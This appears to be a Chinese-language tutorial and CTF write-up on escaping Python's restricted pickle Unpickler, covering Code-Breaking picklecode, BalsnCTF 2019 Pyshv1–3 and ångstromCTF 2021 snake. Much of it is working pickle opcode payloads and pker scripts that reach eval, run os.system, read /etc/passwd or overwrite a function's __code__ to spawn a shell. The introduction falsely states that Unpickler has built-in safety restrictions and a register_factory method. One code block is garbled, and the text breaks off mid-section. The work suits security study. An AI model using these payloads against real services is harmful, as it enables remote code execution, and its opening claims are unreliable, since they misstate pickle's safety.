绕过 Restricted Unpickler
pickle.Unpickler 简介
pickle.Unpickler
类是 Python 中用于反序列化对象的核心类之一。提供了一种将序列化的数据转换回原始 Python 对象的机制。以下是 Unpickler
类的一些重要特点和功能:
-
反序列化:
Unpickler
类用于从序列化的数据中还原原始的 Python 对象。接收一个可读的文件对象或者包含序列化数据的字节流作为输入。 -
定制化:
Unpickler
类可以通过继承并重写一些方法来实现自定义的反序列化逻辑。例如,可以重写find_class
方法以自定义类的查找过程,或者重写load
方法以修改反序列化的行为。 -
安全性:
Unpickler
类对反序列化的数据进行了一定的安全性处理,以防止可能的恶意攻击。它限制了可以被反序列化的类和模块,并提供了一些选项来控制反序列化的安全级别。 -
扩展性:
Unpickler
类支持注册外部的对象工厂,以便在反序列化时生成自定义对象。通过调用register_factory
方法,可以将一个工厂函数与一个特定的类型关联起来,当遇到该类型时,Unpickler
将使用工厂函数创建对象。
使用 pickle.Unpickler
类进行反序列化的基本步骤如下:
-
创建一个
Unpickler
实例,传入可读的文件对象或者字节流作为参数。 -
调用
load
方法开始反序列化过程。该方法会读取序列化数据,并将其转换为 Python 对象。
官方示例如下:
import builtins
import io
import pickle
safe_builtins = {
'range',
'complex',
'set',
'frozenset',
'slice',
}
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
# Only allow safe classes from builtins.
if module == "builtins" and name in safe_builtins:
return getattr(builtins, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))
def restricted_loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()
restricted_loads(pickle.dumps([1, 2, range(15)]))
官方的示例中使用了一个 safe_builtins 白名单来限制可以反序列化的类。在尝试反序列化时, RestrictedUnpickler 会调用 find_class 进行过滤。
find_class
参考 pickle反序列化初探 - 先知社区,绕过 find_class 有两个关键点:
- 当出现
c、i、b'\x93'
时,会调用,所以只要在这三个 opcode 直接引入模块时没有违反规则即可。 - find_class()只会在解析 opcode 时调用一次,所以只要绕过 opcode 执行过程,find_class() 就不会再调用,也就是说 find_class() 只需要过一次,通过之后再产生的函数在黑名单中也不会拦截,所以可以通过
__import__
绕过一些黑名单。
绕过黑名单
寻找未被限制的利用链
Code-Breaking picklecode 给出了一个黑名单的场景
源码如下:
import pickle
import io
import builtins
__all__ = ('PickleSerializer', )
class RestrictedUnpickler(pickle.Unpickler):
blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}
def find_class(self, module, name):
# Only allow safe classes from builtins.
if module == "builtins" and name not in self.blacklist:
return getattr(builtins, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))
class PickleSerializer():
def dumps(self, obj):
return pickle.dumps(obj)
def loads(self, data):
try:
if isinstance(data, str):
raise TypeError("Can't load pickle from unicode string")
file = io.BytesIO(data)
return RestrictedUnpickler(file,
encoding='ASCII', errors='strict').load()
except Exception as e:
return {}
这道题将 eval,exec 等关键词进行了过滤。
{'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}
意味着无法直接通过 cbuiltins\neval
这种方式来获取 eval 函数,对应到 python 源码,即不能通过下面的方式进行获取:
__import__('builtins').eval
绕过这样的限制,就需要不使用点号运算符来获取 eval 函数,自然就可以想到 getattr, __getattribute__
等函数。
getattr(__builtins__,'eval')
__builtins__.__getattribute__('eval')
两种构造差异,第二种构造较为简单
c = b'''cbuiltins
__getattribute__
(S'eval'
tR.
'''
print(pickle.loads(c))
# <built-in function eval>
在 find_class 看来,这段 payload 仅导入了 builtins.__getattribute__
eval,只是一个字符串,因此可以绕过获取到 eval 函数。
c = b'''cbuiltins
__getattribute__
(S'eval'
tR(S'__import__("os").system("ls")'
tR.
'''
第一种绕过的方式较为复杂,需要经过如下的几个步骤:
- 第一步:获取 getattr 函数。这一步的 pickle 可以写为
c = b'''cbuiltins getattr .
- 由于 pickle 不能仅仅只导入一个模块,因此无法直接获取 builtins 模块。
也就是说还需要换一种方式获取
__builtins__
, 例如使用 gloabls() 函数。getattr(globals()['__builtins__'],'eval')
这样一来,第二步需要获取 globals 函数并执行,这一步的 pickle 可以写为
c = b'''cbuiltins globals (tR. '''
- 由于 pickle 不支持字典索引,因此需要通过 dict 的 get 函数来获取
globals()['__builtins__']
于是 payload 需要再进行变换。getattr(dict.get(globals(),'__builtins__'),'eval')
第三步是需要获取 dict.get 函数。当然,这里的导入层数为 3,c 操作码只能够导入 2 层,因此这里需要用到前面的 getattr 函数,也就是通过
getattr(dict,'get')
的方式获取 get 函数c = b'''cbuiltins getattr (cbuiltins dict S'get' tR. '''
- 获取到 get 函数后,就可以从 globals() 获取
__builtins__
c = b'''cbuiltins getattr (cbuiltins dict S'get' tR(cbuiltins globals (tRS'__builtins__' tR. ''' # <module 'builtins' (built-in)>
- 获取到
__builtins__
后,就可以通过getattr(__builtins__,'eval')
获取 eval 函数,由于 getattr 被复用了,我们可以是用 g 操作码进行存储,到第二次使用时使用 p 操作码进行获取. 下面的 payload 中,获取到 getattr 后使用 p0 存储到 memo_0,获取到__builtins__
后使用 p1 存储到 memo_1. 调用时先使用 g1 获取 getattr 函数,然后使用 g1 获取__builtins__
。获取到 eval 后再压入 python 代码,最后执行 lsc = b'''cbuiltins getattr p0 (cbuiltins dict S'get' tR(cbuiltins globals (tRS'__builtins__' tRp1 g0 (g1 S'eval' tR(S'__import__("os").system("ls")' tR. '''
使用 pker 生成 payload: 第一种 payload
getattr = GLOBAL('builtins','getattr')
dict = GLOBAL('builtins','dict')
dict_get = getattr(dict,'get')
globals_dict = GLOBAL('builtins','globals')()
builtins = dict_get(globals_dict,'__builtins__')
eval = getattr(builtins,'eval')
return eval('__import__("os").system("ls")')
第二种 payload
return GLOBAL('builtins','__getattribute__')('eval')('__import__("os").system("ls")')
绕过白名单
利用不安全的白名单
BalsnCTF 2019 Pyshv1 中使用了白名单进行限制。
# securePickle.py
import pickle, io
whitelist = []
# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module not in whitelist or '.' in name:
raise KeyError('The pickle is spoilt :(')
return pickle.Unpickler.find_class(self, module, name)
def loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()
dumps = pickle.dumps
# server.py
pickle.whitelist.append('sys')
securePickle.py 中声明了一个 whitelist, server.py 中将 sys 模块添加到白名单中,sys 模块本身并不安全,也同样可以使用 sys.modules['os']
的方式找到 os 模块,进而执行命令。
属性创建与函数劫持
BalsnCTF 2019 Pyshv2 中白名单只有一个 structs 模块。与 BalsnCTF 2019 Pyshv1 不同的是,BalsnCTF 2019 Pyshv1 中使用了 pickle.Unpickler.find_class(self, module, name)
去寻找类,而这道题中使用的是 __import__
和 getattr 去获取。
# securePickle.py
import pickle
import io
whitelist = []
# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module not in whitelist or '.' in name:
raise KeyError('The pickle is spoilt :(')
module = __import__(module)
return getattr(module, name)
def loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()
dumps = pickle.dumps
# server.py
pickle.whitelist.append('structs')
structs 模块是题目给出的 structs.py,其内容为空。对于 python 中导入的模块,都以通过获取其 __builtins__
属性来获取 builtins 模块对应的字典,获取到这个字典之后,再获取 eval 函数就可以执行任意 python 代码了。目标是构造如下的代码:
structs.__builtins__['eval']
由于需要从字典中取值,因此也需要用到 get 函数,由于这里获取到的 __builtins__
只是一个字典,因此获取 get 函数需要通过 __builtins__['dict'].get
去获取,再次需要通过字典去索引,这就会陷入死循环。
这道题的解法十分巧妙,使用了一种函数劫持的方式。注意到白名单校验之后会通过 __import__
函数去导入模块,然后使用 getattr 获取属性。
module = __import__(module)
return getattr(module, name)
假如我们要通过 getattr(module, name)
获取到 get 函数,就需要 module 的值为 __buitlins__
字典,name 为 get. 则上一步 module = __import__(module)
需要获取到 __buitlins__
字典。但 module 的值仅能为 structs,因此正常情况下无法获取。
但 pickle 在反序列化时是可以进行全局覆盖的,如果将 __import__
覆盖成 __getattribute__
, 则在执行 module = __import__(module)
时,相当于执行:
module = __getattribute__('structs')
此时会获取 structs 模块的 structs 属性。因此这里需要将 structs.structs 赋值为 __buitlins__
字典。但由于 structs.structs 从未声明过,因此不可以直接使用 GLOBAL('structs', 'structs')
这样的形式进行获取,而是需要创建这个成员变量。
python 中获取成员变量通常使用 . 运算符,这个运算符实际上会去查询这个类的 __dict__
属性,__dict__
属性是一个包含了所有成员变量的字典。因此除了使用 . 运算符赋值来创建成员变量以外,还可以直接向 __dict__
属性中添加键值对来添加成员变量。
structs.aaa = "bbb"
structs.__dict__['aaa'] = "bbb"
>>> structs.__dict__['aaa'] = "bbb"
>>> structs.aaa
'bbb'
所以,想要将 structs.structs 赋值为 __builtins__
需要如下的步骤:
__dict__ = GLOBAL('structs', '__dict__')
builtins = GLOBAL('structs', '__builtins__')
__dict__['structs'] = builtins
接着是覆盖 __import__
为 __getattribute__
, 然后获取 get 函数。
gtat = GLOBAL('structs', '__getattribute__')
builtins['__import__'] = gtat
builtin_get = GLOBAL('structs', 'get')
获取到 get 函数之后,就可以从 __buitlins__
字典获取 eval 函数了。最终 exp 为:
__dict__ = GLOBAL('structs', '__dict__')
builtins = GLOBAL('structs', '__builtins__')
gtat = GLOBAL('structs', '__getattribute__')
builtins['__import__'] = gtat
__dict__['structs'] = builtins
builtin_get = GLOBAL('structs', 'get')
eval = builtin_get('eval')
eval('print(open("/etc/passwd").read())')
return
注意:这里已经将 __import__
函数进行了覆盖,因此不能再使用 eval('__import__("os").system("ls")')
来执行系统命令,但是可以使用 open 函数来读取文件内容。
如果在重载的 find_class 中直接调用 pickle.Unpickler.find_class 方法, 这种覆盖 __import__
函数的 payload 会引发提前引发异常导致无法执行到最后的 eval 函数中, 反而无法利用.因此函数劫持这种方式需要具体问题具体分析.
方法创建
假设 structs.py 中存在一个类:
class User(object):
def __init__(self, name, group):
self.name = name
self.group = group
self.isadmin = 0
self.prompt = ''
正常实例化这样一个 User 类得到的对象中是不会有 __call__
方法的.
>>> a = structs.User('aaa','bbb')
>>> a.__call__
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
AttributeError: 'User' object has no attribute '__call__'
但是通过反序列化之后是可以为其添加上这个方法, 下面是 pker 脚本, 脚本中将 __call__
方法设定为构造函数.
User = GLOBAL('structs', 'User')
User.name = 'aaa'
User.group = 'bbb'
User.__call__ = User
return User
运行后就可以看到这个方法可以被正常调用.
>>> a = pickle.loads(b"cstructs\nUser\np0\n0g0\n(}(S'name'\nS'aaa'\ndtbg0\n(}(S'group'\nS'bbb'\ndtbg0\n(}(S'__call__'\ng0\ndtbg0\n.")
>>> a.__call__
<class 'structs.User'>
>>> a.__call__()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: __init__() missing 2 required positional arguments: 'name' and 'group'
其实方法创建与属性创建是一样的, 方法也仅仅是类中的一个属性. 在某些情况下, 创建特定的成员函数会改变类的处理过程, 例如 python 中的描述符.
描述符(descriptor)是一种用于控制属性访问的特殊对象。实现了 __get__
、__set__
和 __delete__
方法的类可以称为一个描述符, 这三个方法分别控制对属性的读取、赋值和删除操作。
描述符对象可以被用作类的属性,当对该属性进行访问时,Python 解释器会调用描述符对象的相应方法来完成属性操作。
描述符主要有三种类型:
- 数据描述符(Data Descriptor):实现了
__get__
和__set__
方法的描述符对象。它可以控制对属性的读取和赋值操作。 -
非数据描述符(Non-Data Descriptor):只实现了
__get__
方法的描述符对象。只能控制对属性的读取操作,无法进行赋值操作。 - 简单描述符(Simple Descriptor):只实现了
__get__
方法或__set__
方法的描述符对象。不能同时控制对属性的读取和赋值操作。
下面是一个示例:
class Descriptor:
def __get__(self, instance, owner):
print("Getting the value")
return instance._value
def __set__(self, instance, value):
print("Setting the value")
instance._value = value
class MyClass:
attribute = Descriptor()
obj = MyClass()
# 对属性进行赋值
obj.attribute = 10
# 对属性进行访问
print(obj.attribute)
在这个示例中,Descriptor
描述符类实现了 __get__
和 __set__
方法。MyClass
类中的 attribute
属性是一个描述符对象。当对 attribute
属性进行赋值和访问时,会自动调用 Descriptor
类的相应方法,从而控制属性的操作。
描述符对象的应用范围广泛,例如可以用于属性的延迟加载、类型检查、数据验证等场景.
BalsnCTF_2019 pyshv3 这道题就是利用创建 __set__
来将一个类转化为描述符.
securePickle.py 文件内容与 pyshv1 一致, server.py 中仅仅将 structs 模块添加到了白名单中.
# File: securePickle.py
import pickle
import io
whitelist = []
# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module not in whitelist or '.' in name:
raise KeyError('The pickle is spoilt :(')
return pickle.Unpickler.find_class(self, module, name)
def loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()
dumps = pickle.dumps
# File: server.py
import securePickle as pickle
import codecs
import os
pickle.whitelist.append('structs')
class Pysh(object):
def __init__(self):
self.key = os.urandom(100)
self.login()
self.cmds = {
'help': self.cmd_help,
'whoami': self.cmd_whoami,
'su': self.cmd_su,
'flag': self.cmd_flag,
}
def login(self):
with open('../flag.txt', 'rb') as f:
flag = f.read()
flag = bytes(a ^ b for a, b in zip(self.key, flag))
user = input().encode('ascii')
user = codecs.decode(user, 'base64')
user = pickle.loads(user)
print('Login as ' + user.name + ' - ' + user.group)
user.privileged = False
user.flag = flag
self.user = user
def run(self):
while True:
req = input('$ ')
func = self.cmds.get(req, None)
if func is None:
print('pysh: ' + req + ': command not found')
else:
func()
def cmd_help(self):
print('Available commands: ' + ' '.join(self.cmds.keys()))
def cmd_whoami(self):
print(self.user.name, self.user.group)
def cmd_su(self):
print("Not Implemented QAQ")
# self.user.privileged = 1
def cmd_flag(self):
if not self.user.privileged:
print('flag: Permission denied')
else:
print(bytes(a ^ b for a, b in zip(self.user.flag, self.key)))
if __name__ == '__main__':
pysh = Pysh()
pysh.run()
# File: structs.py
class User(object):
def __init__(self, name, group):
self.name = name
self.group = group
self.isadmin = 0
self.prompt = ''
获取 flag 的方法是执行 login 函数然后执行 cmd_flag 函数, 但输出 flag 前会验证 user.privileged
, pickle 反序列化后会将 user.privileged
赋值为 False, 也就是说这里即使利用反序列化修改了 user.privileged
的值,也会重新赋值为 False.
结合前面的描述符的知识点, 如果我们将 user.privileged 设置为一个描述符对象, 那么就可以改变 user.privileged = False
的结果.
由于我们可以控制 User 类, 所以只要将其添加一个 __set__
方法, 就可以将 User 类转化为一个描述器.
payload 如下:
User = GLOBAL('structs', 'User')
User.__set__ = User
user = User("aaa", "bbb")
User.privileged = user
return user
注意:
- 给 privileged 赋值的需要是一个描述器实例.
- 题目会接收反序列化的返回值为一个对象,因此实例化的对象需要进行返回
利用代码对象篡改函数
python 中利用代码对象 RCE 这种利用手法通常出现在 pyjail 中,因为需要能够输入 python 代码并执行。其利用方式有两种:
- 创建一个新的代码对象,然后执行
- 或者覆盖现有函数的
__code__
属性,利用代码本身的执行流程执行。
在 python 反序列化的场景下,由于只能够创建、修改对象,无法控制对象的执行,因此第一种方式行不通,只能通过第二种方式。
下面是一个测试。
def read():
return print(open("/etc/passwd",'r').read())
def readTest():
return print(open("/flag",'r').read())
function_type = type(lambda: None)
code_type = type((lambda: None).__code__)
code = read.__code__
argcount = code.co_argcount
posonlyargcount = code.co_posonlyargcount
kwonlyargcount = code.co_kwonlyargcount
nlocals = code.co_nlocals
stacksize = code.co_stacksize
flags = code.co_flags
codestring = code.co_code
constants = code.co_consts
names = code.co_names
varnames = code.co_varnames
filename = code.co_filename
name = code.co_name
qualname = code.co_qualname
firstlineno = code.co_firstlineno
linetable = code.co_linetable
exceptiontable = code.co_exceptiontable
freevars = code.co_freevars
cellvars = code.co_cellvars
mydict = {}
mydict['__builtins__'] = __builtins__
codeobj = code_type(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, qualname, firstlineno, linetable, exceptiontable, freevars, cellvars)
# code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, qualname, firstlineno, linetable, exceptiontable, freevars=(), cellvars=(),/)
# function_type(codeobj, mydict, None, None, None)()
# eval(codeobj)
readTest.__code__ = codeobj
readTest()
将 readTest 的__code__
属性进行修改后,执行 readTest 函数就会执行我们的 payload。
ångstromCTF 2021 snake 这道题就是利用这种攻击手法。题目利用 find_class 限制了导入模块时, module 只能够为 __main__
,name 只能够以 Snake
开头, 最多索引两层,并且 name 的长度小于 20。
题目完整源码如下, 可以看到 __main__
中以 Snake 开头且长度小于 20 的只有 SnakeSave 和 SnakeWindow。
#!/usr/bin/python3 -SIEs
import curses
import random
import base64
import pickle
import io
class SnakeSave:
def __init__(self, highScores, game=None):
self.highScores = highScores
self.game = game
class HighScores:
def __init__(self, player):
self.player = player
self.scores = []
def getHighScore(self, score):
return max(self.scores+[score])
class Game:
def __init__(self, width, height, coords):
self.width = width
self.height = height
self.coords = coords
self.direction = curses.KEY_RIGHT
self.score = 0
self.food = (random.randint(1, self.height-2), random.randint(1, self.width-2))
while self.food in self.coords: self.food = (random.randint(1, self.height-2), random.randint(1, self.width-2))
def move(self):
self.coords.append((
self.coords[-1][0] + (1 if self.direction == curses.KEY_DOWN else -1 if self.direction == curses.KEY_UP else 0),
self.coords[-1][1] + (1 if self.direction == curses.KEY_RIGHT else -1 if self.direction == curses.KEY_LEFT else 0)
))
if self.coords[-1][0] > 18 or self.coords[-1][1] > 58 or \
self.coords[-1][0] < 1 or self.coords[-1][1] < 1 or \
self.coords.index(self.coords[-1]) != len(self.coords) - 1: return False
if self.food == self.coords[-1]:
self.score += 1
while self.food in self.coords: self.food = (random.randint(1, self.height-2), random.randint(1, self.width-2))
return None
else:
erase = self.coords[0]
self.coords = self.coords[1:]
return erase
class SnakeRestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module == "__main__" and name.startswith("Snake") and name.count(".") <= 1 and len(name) <= len("SnakeSave.HighScores"):
return super().find_class(module, name)
raise pickle.UnpicklingError(f"HACKING DETECTED")
def SnakeWindow(_):
curses.curs_set(0)
win = curses.newwin(20, 60, 0, 0)
win.border(0)
win.keypad(1)
win.timeout(100)
win.addch(game.food[0], game.food[1], '*')
for coord in game.coords: win.addch(coord[0], coord[1], '#')
while True:
win.addstr(0, 2, f"{highScores.player}'s Score: {game.score:05d}")
win.addstr(0, 41, f"High Score: {highScores.getHighScore(game.score):05d}")
key = win.getch()
if key == 27: return True
if key in (curses.KEY_LEFT, curses.KEY_RIGHT, curses.KEY_DOWN, curses.KEY_UP): game.direction = key
erase = game.move()
if erase == False: return
elif erase: win.addch(erase[0], erase[1], ' ')
else: win.addch(game.food[0], game.food[1], '*')
win.addch(game.coords[-1][0], game.coords[-1][1], '#')
print('Welcome to snake! Eat as many pickles as you can. Hit a wall or yourself and you die. Press escape to resume later.')
if input('Do you have a restore code? [y/n] ')[0].lower() == 'y':
snake = SnakeRestrictedUnpickler(io.BytesIO(base64.b64decode(input('Restore code: ')))).load()
print(snake)
highScores = snake.highScores
if snake.game: game = snake.game
else: game = SnakeSave.Game(60, 20, [(12, 12), (12, 13), (12, 14)])
else:
highScores = SnakeSave.HighScores(input('Enter your name: '))
game = SnakeSave.Game(60, 20, [(12, 12), (12, 13), (12, 14)])
left = curses.wrapper(SnakeWindow)
if left:
print(f"Enter the following code to resume your game later: {base64.b64encode(pickle.dumps(SnakeSave(highScores, game))).decode('ascii')}")
else:
highScores.scores.append(game.score)
print(f"You ate {game.score} pickles!")
print(f"{highScores.player}'s Top 10 Scores:")
for num, score in enumerate(sorted(highScores.scores, reverse=True)):
print(f"{num+1}. {score}")
if num > 9: break
print(f"Restore your data with the following code: {base64.b64encode(pickle.dumps(SnakeSave(highScores))).decode('ascii')}")
因此这里的目标是修改 SnakeWindow 函数。
第一步:修改函数的 __code__
属性
一般情况下,修改成员变量可以使用 DICT 和 BUILD 指令,也就是 db
操作码。
p = PROTO + b'\x04' + \
GLOBAL + b'__main__\nSnakeWindow\n' + \
MARK + \
UNICODE + b'__code__\n' + \
UNICODE + b'cccc\n' + \
b'db' + \
STOP
但这段代码只会在 SnakeWindow 实例的 __dict__
属性中添加一个键值对, 并不会将真正的 __code__
属性进行覆盖。
>>>a = loads(p)
>>>a.__code__
<code object SnakeWindow at 0x2f90790, file "/mnt/share/project/ctf_archives/test/python_sec/pickle/ångstromCTF 20214/snake/test.py", line 54>
>>>a.__dict__
{'__code__': 'bbbb'}
BUILD 的行为在 pickle 源代码中的 load_build 函数中定义:
def load_build(self):
stack = self.stack
state = stack.pop()
inst = stack[-1]
setstate = getattr(inst, "__setstate__", None)
if setstate is not None:
setstate(state)
return
slotstate = None
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if state:
inst_dict = inst.__dict__
intern = sys.intern
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build
由于 code 类并没有 __setstate__
函数,因此不会调用 setstate 函数。
如果 state 不为 False 或者 None 的话,就会进入 __dict__
的处理流程,得到的就是上面的结果,无法覆盖正常的 __code__
属性。
因此我们需要让 state 的判断为 None 或者 False。state 来源于上一个判断中 state 的第一个元素。
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
又因为进入下面的赋值时,我们需要 k 和 v 分别为 __code__
和要篡改的值。
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
所以我们可以将 state 赋值为:
(None,{'__code__',xxxxx})
综上所述,为了调用 setattr 来覆盖真正的 __code__
属性,我们需要在栈上压入:
- SnakeWindow
(None,{'__code__',xxxxx})
两个元素,然后执行 BUILD 操作码。
因此 payload 可以改为:
p = GLOBAL + b'__main__\nSnakeWindow\n' + \
NONE + \
MARK + \
UNICODE + b'__code__\n' + \
UNICODE + b'bbbb\n' + \
DICT + \
TUPLE2 + \
BUILD + \
STOP
由于这里赋值 __code__
时没有传入 code 对象,因此报错是正常的。后面只要构造出 code 对象,将其进行替换即可。这一段 payload 可以作为一个 gadget。
a = loads(p)
Traceback (most recent call last):
File "<string>", line 1, in <module>
TypeError: __code__ must be set to a code object
第二步:构建 code 对象
我们可以编写 payload 函数,并打印所有 __code__
子属性。
def read(_):
return __import__('os').system('reset;sh')
print(read.__code__.co_argcount)
print(read.__code__.co_posonlyargcount)
print(read.__code__.co_kwonlyargcount)
print(read.__code__.co_nlocals)
print(read.__code__.co_stacksize)
print(read.__code__.co_flags)
print(read.__code__.co_code)
print(read.__code__.co_consts)
print(read.__code__.co_names)
print(read.__code__.co_varnames)
print(read.__code__.co_filename)
print(read.__code__.co_name)
print(read.__code__.co_qualname)
print(read.__code__.co_firstlineno)
print(read.__code__.co_linetable)
print(read.__code__.co_exceptiontable)
print(read.__code__.co_freevars)
print(read.__code__.co_cellvars)
可以得到:
1
0
0
1
3
3
b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x02\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00S\x00'
(None, 'os', 'reset;sh')
('__import__', 'system')
('_',)
/mnt/share/project/ctf_archives/test/python_sec/pickle/test.py
read
read
3
b'\x80\x00\xdd\x0b\x15\x90d\xd1\x0b\x1b\xd4\x0b\x1b\xd7\x0b"\xd2\x0b"\xa0:\xd1\x0b.\xd4\x0b.\xd0\x04.'
b''
()
()
正常情况下,可以通过 __code__.__class__
获取到 CodeType(pickle 协议 < 4 时不允许索引多层), PROTO 指定协议版本为 4
p = PROTO + b'\x04' + \
GLOBAL + b'__main__\nSnakeWindow.__code__.__class__\n' + \
STOP
print(loads(p))
# <class 'code'>
但这道题限制了只能索引一层。因此需要通过获取 type 函数,由于类的 __class__
属性就是 type 函数,我们可以通过 SnakeSave.__class__
获取 type 函数.
SnakeSave.__class__(SnakeWindow.__code__.__class__)
# <class 'type'>
```属性
上述的代码转化为 pickle 后如下:
```py属性
GLOBAL + b'__main__\nSnakeSave.__class__\n' + \
GLOBAL + b'__main__\nSnakeWindow.__code__\n' + \
TUPLE1 + REDUCE + \
获取到 CodeType 就可以传入参数并执行了:
p = PROTO + b'\x04' + \
GLOBAL + b'__main__\nSnakeSave.__class__\n' + \
GLOBAL + b'__main__\nSnakeWindow.__code__\n' + \
TUPLE1 + REDUCE + \
MARK + \
BININT1 + b'\x01' + \
BININT1 + b'\x00' + \
BININT1 + b'\x00' + \
BININT1 + b'\x01' + \
BININT1 + b'\x03' + \
BININT1 + b'\x03' + \
SHORT_BINBYTES + b'\x46' + b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x02\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00S\x00' + \
NONE + UNICODE + b'os\n' + UNICODE + b'reset;sh\n' + TUPLE3 + \
UNICODE + b'__import__\n' + UNICODE + b'system\n' + TUPLE2 + \
UNICODE + b'_\n' + TUPLE1 + \
UNICODE + b'solve.py\n' + \
UNICODE + b'read\n' + \
UNICODE + b'read\n' + \
BININT1 + b'\x03' + \
SHORT_BINBYTES + b'\x1e' + b'\x80\x00\xdd\x0b\x15\x90d\xd1\x0b\x1b\xd4\x0b\x1b\xd7\x0b"\xd2\x0b"\xa0:\xd1\x0b.\xd4\x0b.\xd0\x04.' + \
SHORT_BINBYTES + b'\x00' + \
EMPTY_TUPLE + \
EMPTY_TUPLE + \
TUPLE + \
REDUCE + \
STOP
print(loads(p))
# <code object read at 0x7f7af9301730, file "solve.py", line 3>
这里需要注意的有两点:
- SHORT_BINBYTES 第一个字节为长度。
- 倒数第三个属性 co_exceptiontable 为空,不能直接传入
SHORT_BINBYTES + b'' + \,
应该传入SHORT_BINBYTES + b'\x00' + \
。
获取到代码对象之后,将其替换到第一步的 payload 中,最终 payload 如下:
p = PROTO + b'\x04' + \
GLOBAL + b'__main__\nSnakeWindow\n' + \
NONE + \
MARK + \
UNICODE + b'__code__\n' + \
GLOBAL + b'__main__\nSnakeSave.__class__\n' + \
GLOBAL + b'__main__\nSnakeWindow.__code__\n' + \
TUPLE1 + REDUCE + \
MARK + \
BININT1 + b'\x01' + \
BININT1 + b'\x00' + \
BININT1 + b'\x00' + \
BININT1 + b'\x01' + \
BININT1 + b'\x03' + \
BININT1 + b'\x03' + \
SHORT_BINBYTES + b'\x46' + b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x02\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00S\x00' + \
NONE + UNICODE + b'os\n' + UNICODE + b'reset;sh\n' + TUPLE3 + \
UNICODE + b'__import__\n' + UNICODE + b'system\n' + TUPLE2 + \
UNICODE + b'xd\n' + TUPLE1 + \
UNICODE + b'solve.py\n' + \
UNICODE + b'read\n' + \
UNICODE + b'read\n' + \
BININT1 + b'\x03' + \
SHORT_BINBYTES + b'\x1e' + b'\x80\x00\xdd\x0b\x15\x90d\xd1\x0b\x1b\xd4\x0b\x1b\xd7\x0b"\xd2\x0b"\xa0:\xd1\x0b.\xd4\x0b.\xd0\x04.' + \
SHORT_BINBYTES + b'\x01' + \
EMPTY_TUPLE + \
EMPTY_TUPLE + \
TUPLE + \
REDUCE + \
DICT + \
TUPLE2 + \
BUILD + \
STOP
print(loads(p))
SnakeWindow("")
再次执行 SnakeWindow 函数时会进入 sh。
由于 pker 没有实现二进制字符串,因此 pker 没法直接构造。
利用 load_build RCE
pickle load_build 函数对应的是 BUILD 操作码的行为,用于完成对象属性的赋值,但 load_build 在一定条件下可以执行任意方法,且参数可控,从而导致任意命令执行。由于最终的函数调用是通过 pickle 自身的代码来完成的,因此我们的 payload 中不会出现 R 字符。
下面是这种攻击方式的原理:
BUILD 指令对应 pickle 源代码中的 load_build 函数。
def load_build(self):
stack = self.stack
state = stack.pop()
inst = stack[-1]
setstate = getattr(inst, "__setstate__", None)
if setstate is not None:
setstate(state)
return
slotstate = None
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if state:
inst_dict = inst.__dict__
intern = sys.intern
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build
在上面篡改函数字节码中,我们用到的是 load_build 中走向 setattr 的判断分支。但注意观察可以发现, 在下面的这个分支中, setstate 和 state 其实都是可控的,因此这里可以执行任意函数。
if setstate is not None:
setstate(state)
return
追溯 setstate 的来源可以发现,load_build 首先获取栈上的字节码 b 前的一个元素。然后获取其 __setstate__
属性的值,如果这个属性存在,则把这个属性的值当作函数来执行。
def load_build(self):
stack = self.stack
state = stack.pop()
inst = stack[-1]
setstate = getattr(inst, "__setstate__", None)
if setstate is not None:
setstate(state)
return
